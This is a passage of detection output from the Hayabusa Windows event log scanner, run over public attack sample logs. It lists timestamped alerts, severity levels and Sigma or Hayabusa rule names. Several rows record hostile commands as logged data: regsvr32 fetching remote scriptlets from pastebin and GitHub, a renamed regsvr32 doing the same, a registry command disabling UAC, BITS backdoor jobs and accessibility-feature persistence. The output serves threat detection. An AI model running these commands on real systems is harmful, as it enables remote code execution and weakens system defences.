c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx -2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx -2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx -2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: 
C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx -2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process 
Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx -2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx -2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx -2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx -2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe 
-Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx -2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx -2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule 
Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx -2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
